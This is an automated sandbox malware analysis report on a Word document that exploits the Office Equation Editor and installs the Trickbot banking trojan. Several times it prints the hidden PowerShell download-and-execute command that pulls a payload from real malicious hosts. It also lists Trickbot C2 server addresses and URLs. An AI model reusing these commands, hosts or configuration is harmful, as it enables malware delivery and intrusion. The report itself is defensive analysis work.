Analysis Report

Overview

General Information

Joe Sandbox Version: 22.0.0
Analysis ID: 565263
Start time: 16:02:28
Joe Sandbox Product: Cloud
Start date: 25.05.2018
Overall analysis duration: 0h 21m 9s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: FORMP16T.docx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 23
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.evad.expl.troj.winDOCX@23/42@10/4
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 99
  • Number of non-executed functions: 86
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found application associated with file extension: .docx
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Number of clicks: 162
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): mscorsvw.exe, rundll32.exe, OSPPSVC.EXE, svchost.exe, mrxdav.sys, conhost.exe, WMIADAP.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtEnumerateValueKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe, ounehcnaykuL.exe, ounehcnaykuM.exe, ounehcnaykuM.exe

Detection

Strategy     Score   Range     Reporting        Detection
Threshold    100     0 - 100   Report FP / FN   malicious

Confidence

Strategy     Score   Range   Further Analysis Required?   Confidence
Threshold    5       0 - 5   false


Classification

Analysis Advice

Sample monitors window changes (e.g. starting applications); analyze the sample with the 'Simulates keyboard and window changes' cookbook.



Signature Overview


Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 18_2_001E76E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,18_2_001E76E0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 18_2_001EF590 CryptBinaryToStringW,CryptBinaryToStringW,18_2_001EF590
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 18_2_001EF9A0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,18_2_001EF9A0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 18_2_001EBB60 CryptStringToBinaryW,CryptStringToBinaryW,18_2_001EBB60
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 21_2_001776E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,21_2_001776E0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 21_2_0017F9A0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,21_2_0017F9A0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 21_2_0017F590 CryptBinaryToStringW,CryptBinaryToStringW,21_2_0017F590
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 21_2_0017BB60 CryptStringToBinaryW,CryptStringToBinaryW,21_2_0017BB60

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 18_2_001E76E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,18_2_001E76E0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Code function: 21_2_001776E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,21_2_001776E0

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\System32\cmd.exe
Office Equation Editor has been started
Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Detected Trickbot e-Banking trojan config
Source: ounehcnaykuM.exe, 00000015.00000002.10777869997.001FC000.00000004.sdmpString found in binary or memory: <mcconf><ver>1000199</ver><gtag>ser0525</gtag><servs><srv>65.30.201.40:443</srv><srv>66.232.212.59:443</srv><srv>183.54.140.124:443</srv><srv>80.53.57.146:443</srv><srv>31.200.192.251:443</srv><srv>208.75.117.70:449</srv><srv>92.55.251.211:449</srv><srv>94.112.52.197:449</srv><srv>138.34.29.172:443</srv><srv>209.121.142.202:449</srv><srv>5.102.177.205:449</srv><srv>209.121.142.214:449</srv><srv>95.161.180.42:449</srv><srv>203.86.222.142:443</srv><srv>68.96.73.154:449</srv><srv>185.42.192.194:449</srv><srv>68.227.31.46:449</srv><srv>107.144.49.162:443</srv><srv>46.72.175.17:449</srv><srv>144.48.51.8:443</srv><srv>46.243.179.212:449</srv><srv>81.177.255.76:449</srv><srv>193.233.60.148:443</srv><srv>185.174.174.83:443</srv><srv>193.233.62.53:443</srv><srv>91.240.84.224:443</srv><srv>185.228.232.67:443</srv><srv>85.143.215.143:443</srv></servs><autorun><module name="systeminfo" ctl="GetSystemInfo"/><module name="injectDll"/></autorun></mcconf>ies>false</StopIfGoingOnBatteries>

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user~1\AppData\Local\Temp\task.bat
Potential document exploit detected (performs DNS queries with low reputation score)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | DNS query: name: figs4u.co.uk
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | DNS query: name: cypruscars4u.com
Potential document exploit detected (performs DNS queries)
Source: global traffic | DNS query: name: cypruscars4u.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic | TCP traffic: 192.168.1.16:49191 -> 87.247.241.143:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.1.16:49188 -> 87.247.241.143:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex CnC) 82.202.221.37:447 -> 192.168.1.16:49197
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.1.16:49195 -> 92.55.251.211:449
Source: global traffic | TCP traffic: 192.168.1.16:49197 -> 82.202.221.37:447
Domain name seen in connection with other malware
Source: Joe Sandbox View | Domain Name: figs4u.co.uk figs4u.co.uk
Source: Joe Sandbox View | Domain Name: cypruscars4u.com cypruscars4u.com
Downloads files with wrong headers with respect to MIME Content-Type
Source: httpImage file has RTF prefix: HTTP/1.1 200 OK Date: Fri, 25 May 2018 14:04:15 GMT Server: Apache Last-Modified: Fri, 25 May 2018 10:39:39 GMT Accept-Ranges: bytes Content-Length: 55287 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 7b 5c 72 74 66 31 7b 5c 70 69 63 74 5c 6a 70 65 67 62 6c 69 70 5c 70 69 63 77 32 34 5c 70 69 63 68 32 34 5c 62 69 6e 31 35 35 35 30 20 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 01 20 01 cc 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 01 01 01 00 03 01 01 00 00 00 00 00 00 0
May check the online IP address of the machine
Source: unknown | DNS query: name: ipinfo.io
Source: unknown | DNS query: name: ipinfo.io
Source: unknown | DNS query: name: ipinfo.io
Source: unknown | DNS query: name: ipinfo.io
Downloads executable code via HTTP
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 25 May 2018 14:05:03 GMTServer: ApacheLast-Modified: Fri, 25 May 2018 10:33:56 GMTAccept-Ranges: bytesContent-Length: 270387Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3d 00 7b de 79 61 15 8d 79 61 15 8d 79 61 15 8d fa 7d 1b 8d 78 61 15 8d 10 7e 1c 8d 7e 61 15 8d 90 7e 18 8d 78 61 15 8d 52 69 63 68 79 61 15 8d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 c2 07 5b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 01 00 00 b0 02 00 00 00 00 00 e4 16 00 00 00 10 00 00 00 70 01 00 0
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /logo.bin HTTP/1.1 Host: figs4u.co.uk Connection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: SELECTELRU SELECTELRU
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: GET /logo.jpg HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) Accept-Encoding: gzip, deflate Host: cypruscars4u.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Host: ipinfo.io
Downloads files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /logo.jpg HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) Accept-Encoding: gzip, deflate Host: cypruscars4u.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /logo.bin HTTP/1.1 Host: figs4u.co.uk Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Host: ipinfo.io
Found strings which match to known social media urls
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: cypruscars4u.com
Urls found in memory or binary data
Source: powershell.exe, 0000000A.00000002.10093802704.01B10000.00000004.sdmp | String found in binary or memory: file://
Source: powershell.exe, 0000000A.00000002.10093802704.01B10000.00000004.sdmp | String found in binary or memory: file:///
Source: WINWORD.EXE, 00000001.00000002.10277396020.04500000.00000004.sdmp | String found in binary or memory: file:///C:
Source: powershell.exe, 0000000A.00000002.10088000862.0030F000.00000004.sdmp | String found in binary or memory: file:///C:/Users/user~1/AppData/Local/Temp/ounehcnaykuL.exe
Source: WINWORD.EXE, 00000001.00000002.10258196864.00377000.00000004.sdmp | String found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Temporary%20Internet%20Files/Content.IE5
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmp | String found in binary or memory: file:///C:/Users/user/Desktop/FORMP16T.docxZ
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmp | String found in binary or memory: file:///C:/Users/user/Desktop/FORMP16T.docxl
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmp | String found in binary or memory: file:///C:/Users/user/Desktop/FORMP16T.docx~
Source: powershell.exe, 0000000A.00000002.10088000862.0030F000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/-j).l
Source: powershell.exe, 0000000A.00000002.10088000862.0030F000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/;j).IN
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Diagnostics/1.0.0.0__31bf3856ad36
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Management/1.0.0.0__31bf3856ad364
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/1.0.0.0__31bf3856ad364e35
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.ConsoleHost/1.0.0.0__31bf3856ad364e35/Micr
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Security/1.0.0.0__31bf3856ad364e35/Microso
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.WSMan.Management/1.0.0.0__31bf3856ad364e35/Microsoft.
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.M
Source: powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmp | String found in binary or memory: http://
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp, ounehcnaykuM.exe, 00000015.00000002.10780297708.01C40000.00000004.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.21.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: cypruscars4u.com.url.1.dr | String found in binary or memory: http://cypruscars4u.com/
Source: WINWORD.EXE, 00000001.00000002.10257427295.002D3000.00000004.sdmp | String found in binary or memory: http://cypruscars4u.com/&
Source: WINWORD.EXE, 00000001.00000002.10257427295.002D3000.00000004.sdmp | String found in binary or memory: http://cypruscars4u.com/j
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmp, WINWORD.EXE, 00000001.00000002.10274125297.03080000.00000004.sdmp, WINWORD.EXE, 00000001.00000002.10274326524.031A0000.00000004.sdmp, WINWORD.EXE, 00000001.00000002.10274433979.031C0000.00000004.sdmp, WINWORD.EXE, 00000001.00000003.10250318411.002D2000.00000004.sdmp, logo.jpg.url.1.dr | String found in binary or memory: http://cypruscars4u.com/logo.jpg
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmp | String found in binary or memory: http://cypruscars4u.com/logo.jpgER=E
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmp | String found in binary or memory: http://cypruscars4u.com/logo.jpgSSOO
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmp | String found in binary or memory: http://cypruscars4u.com/logo.jpgT
Source: WINWORD.EXE, 00000001.00000002.10274433979.031C0000.00000004.sdmp | String found in binary or memory: http://cypruscars4u.com/logo.jpgTg
Source: WINWORD.EXE, 00000001.00000002.10274433979.031C0000.00000004.sdmp | String found in binary or memory: http://cypruscars4u.com/logo.jpgUg
Source: WINWORD.EXE, 00000001.00000002.10256887267.001FD000.00000004.sdmp | String found in binary or memory: http://cypruscars4u.com/logo.jpggesktop
Source: WINWORD.EXE, 00000001.00000002.10274433979.031C0000.00000004.sdmp | String found in binary or memory: http://cypruscars4u.com/logo.jpgtion.%Word
Source: WINWORD.EXE, 00000001.00000002.10276262517.03F30000.00000004.sdmp | String found in binary or memory: http://cypruscars4u.comlogo.jpg
Source: powershell.exe, 0000000A.00000002.10095450491.01D62000.00000004.sdmp | String found in binary or memory: http://figs4u.8
Source: powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmp | String found in binary or memory: http://figs4u.co.uk
Source: powershell.exe, 0000000A.00000002.10086956888.002D4000.00000004.sdmp, powershell.exe, 0000000A.00000002.10093802704.01B10000.00000004.sdmp, powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmp, powershell.exe, 0000000A.00000003.9981814778.002DD000.00000004.sdmp, task (2).bat.1.dr | String found in binary or memory: http://figs4u.co.uk/logo.bin
Source: powershell.exe, 0000000A.00000003.9981582440.002F0000.00000004.sdmp | String found in binary or memory: http://java.com/
Source: powershell.exe, 0000000A.00000003.9981582440.002F0000.00000004.sdmp | String found in binary or memory: http://java.com/help
Source: powershell.exe, 0000000A.00000003.9981582440.002F0000.00000004.sdmp | String found in binary or memory: http://java.com/helphttp://java.com/help
Source: powershell.exe, 0000000A.00000003.9981582440.002F0000.00000004.sdmp | String found in binary or memory: http://java.com/http://java.com/
Source: WINWORD.EXE, 00000001.00000002.10274644205.0330D000.00000004.sdmp | String found in binary or memory: http://ns.ad
Source: WINWORD.EXE, 00000001.00000002.10274644205.0330D000.00000004.sdmp | String found in binary or memory: http://ns.adbe.
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: cmd.exe, 00000008.00000002.10109548717.00433000.00000004.sdmp | String found in binary or memory: http://respons2
Source: powershell.exe, 0000000A.00000002.10086956888.002D4000.00000004.sdmp, powershell.exe, 0000000A.00000002.10093802704.01B10000.00000004.sdmp, powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmp, powershell.exe, 0000000A.00000003.9981814778.002DD000.00000004.sdmp, task (2).bat.1.dr | String found in binary or memory: http://responsivepixels.co.uk/logo.bin
Source: WINWORD.EXE, 00000001.00000002.10257159625.00280000.00000004.sdmp | String found in binary or memory: http://schem
Source: WINWORD.EXE, 00000001.00000002.10257159625.00280000.00000004.sdmp | String found in binary or memory: http://schemL?
Source: powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmp, powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmp | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationFilter
Source: powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmp | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/SelectorFilter
Source: powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmp | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#IdentifyResponsep
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: WINWORD.EXE, 00000001.00000002.10274217774.03090000.00000004.sdmp | String found in binary or memory: http://www.msnusers.com
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: http://www.usertrust.com1
Source: ounehcnaykuM.exe, 00000015.00000002.10780297708.01C40000.00000004.sdmp | String found in binary or memory: https://82.202.221.37:447/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/5/injectDll32/
Source: ounehcnaykuM.exe, 00000015.00000002.10780297708.01C40000.00000004.sdmp | String found in binary or memory: https://82.202.221.37:447/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/5/injectDll32/VHK/
Source: ounehcnaykuM.exe, 00000015.00000002.10780297708.01C40000.00000004.sdmp | String found in binary or memory: https://82.202.221.37:447/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/5/systeminfo32/kE
Source: ounehcnaykuM.exe, 00000015.00000002.10777808439.001D4000.00000004.sdmp | String found in binary or memory: https://92.55.251.211:449/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/10/62/LNOPIYJTPCBO
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: https://92.55.251.211:449/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/5/spk/
Source: ounehcnaykuM.exe, 00000015.00000002.10777944562.0022E000.00000004.sdmp, ounehcnaykuM.exe, 00000015.00000002.10780297708.01C40000.00000004.sdmp | String found in binary or memory: https://92.55.251.211:449/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/63/systeminfo/GetS
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0

Remote Access Functionality:

Detected Trickbot Trojan
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | File created: C:\Users\user\AppData\Roaming\freenet\Modules\systeminfo32

Persistence and Installation Behavior:

Contains an external reference to another document
Source: webSettings.xml.rels | Binary or memory string: <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="http://cypruscars4u.com/logo.jpg" TargetMode="External"/>
Installs new ROOT certificates
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Tries to download and execute files (via powershell)
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe | File created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Data Obfuscation:

Powershell starts a process from the temp directory
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Suspicious powershell command line found
